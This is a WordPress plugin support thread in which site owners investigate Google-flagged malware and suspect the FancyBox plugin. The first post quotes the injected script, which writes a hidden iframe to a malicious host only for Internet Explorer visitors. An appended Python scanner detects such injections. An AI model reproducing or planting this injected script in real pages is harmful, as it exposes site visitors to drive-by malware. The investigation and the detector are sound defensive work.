Support » Plugin: FancyBox for WordPress » Possible malware

  • Resolved SherabGyamtso

    (@sherabgyamtso)


    I have the latest version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from SiteLock that my Contact page on my blog is infected with malware with an iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Checked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I deactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody help me to determine the source of this malware?

    Best

    Maciek

    https://wordpress.org/plugins/w3-total-cache/

Viewing 15 replies - 1 through 15 (of 110 total)
  • Total Cache has nothing to do with this, a client of mine got the same code today leading to 203koko.eu, blocked by Google as well for malware, but we can’t find the code in our pages at all which is very strange. Site did not have W3 Total Cache installed.

    The only plugin we have in common is FancyBox for WordPress.

    Can you please mail me at gennady[at]kovshenin[dot]com, I want access to your site to try to find the malware on yours, maybe it will help us find it on ours, since we can’t even get it to show anywhere on the pages although Google found it.

    wslade

    (@wslade)

    Johan Elisson

    (@johan-elisson)

    I have the same problem with http://anglarna.se/ which is a site I’m webmaster for. I can’t seem to find the code snippet anywhere on any of the indicated pages either.

    We have the following plugins (all latest version)
    AdRotate
    Contact Form 7
    Custom Facebook Feed
    Download Manager
    FancyBox for WordPress
    HTML Editor Reloaded
    NextGEN Gallery by Photocrati
    Quick Page/Post Redirect Plugin
    Really Simple CAPTCHA
    Share Buttons by AddToAny
    Surveys
    WP-Polls
    WP to Twitter
    Yoast Breadcrumbs

    Full source of OP’s page here: http://hastebin.com/raw/acawutiwaq for those following the investigation.

    Johan, contact me please. I’m actively investigating this issue and we can help each other, I need access to another infected server to compare files.

    Jan Eckhoff

    (@janeckhoff)

    Hi guys, sorry for using this forum but …

    me and a colleague also had the problem today.

    Both sites got malware listed by Google but on none we could find the code mentioned above.

    Both sites are using “Fancybox for WordPress”. But we have other sites online with that plugin that didn’t get blocked.

    Weird.

    bigant841

    (@bigant841)

    I have the same problem as well with a client’s site of mine. I checked every file and there is no indication of this script. Any luck with anyone yet?

    RedKobra

    (@redkobra)

    I have also got “h t t p://203koko.eu/hjnfh/ipframe2.php” on my site. I got the dreaded email from Google saying my site has malware infected on it. I am currently in contact with Host Gator. They are currently scanning my site for malicious code. I have Total Cache as one of my site’s plugins.

    I will keep everyone posted once I hear back from Host Gator.

    Consultis

    (@consultis)

    I too have been hit by this “drive-by” malware today. Half of my morning has been eaten up by this wild goose chase. Glad to see I’m not the only one.

    The only overlap I have with plugins from the above posters is FancyBox and Contact Form 7. I do not have the W3 Total Cache plugin.

    I’m tempted to disable FancyBox, as it hasn’t been updated in years. “Easy FancyBox” seems like a suitable replacement.

    areohdeee

    (@areohdeee)

    It’s looking like “Fancybox for WordPress”

    it’s the only PI we have in common with the rest of you.

    bigant841

    (@bigant841)

    I have fancy box as well but disabled it. But this may be the problem that is causing all of our issues.

    RedKobra

    (@redkobra)

    I have Contact Form 7 and Fancybox on my site as well. All my plugins are updated to most current ones.

    Has anyone been able to actually see the code in question? Seems like it only shows up to Internet Explorer users.

    Johan Elisson

    (@johan-elisson)

    I’ve removed the “Fancybox for WordPress” plugin and requested a review from Google for my site. I’ll report back on the result.
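
Added example, not part of any post in this thread: a static check for the kind of snippet the original poster quoted, an inline script that uses document.write to emit an off-screen iframe pointing at another host. The Internet Explorer test in that snippet is client-side JavaScript, so the check reads page source rather than rendered output; `scan_html`, `blog.example`, `malicious.example` and the sample page are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Typographic quotes that page rendering may substitute for ASCII quotes.
_QUOTES = str.maketrans({"‘": "'", "’": "'", "“": '"', "”": '"', "″": '"', "′": "'"})
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
HIDDEN_RE = re.compile(
    r"(?:left|top)\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def scan_html(html, site_host):
    """Flag inline scripts that document.write an iframe served from another host."""
    findings = []
    for match in SCRIPT_RE.finditer(html.translate(_QUOTES)):
        body = match.group(1)
        if "document.write" not in body:
            continue
        for src in IFRAME_RE.findall(body):
            host = urlparse(src).hostname or ""
            # Relative URLs and the site's own (sub)domains are not reported.
            if not host or host == site_host or host.endswith("." + site_host):
                continue
            findings.append({
                "iframe_host": host,
                "hidden": bool(HIDDEN_RE.search(body)),       # pushed off-screen or hidden
                "ua_gated": "navigator.userAgent" in body,    # only written for some browsers
            })
    return findings

# Constructed sample page: one ordinary embed plus an injected script shaped like
# the one quoted in the first post, with a placeholder domain.
SAMPLE = """<html><body><h1>Contact</h1>
<iframe src="https://video.example/embed/1" width="560"></iframe>
<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”http://malicious.example/x/frame.php” width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE, "blog.example"):
        print(finding)
```

The ordinary embed in the sample is ignored because it is plain markup, not something an inline script writes into the page.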
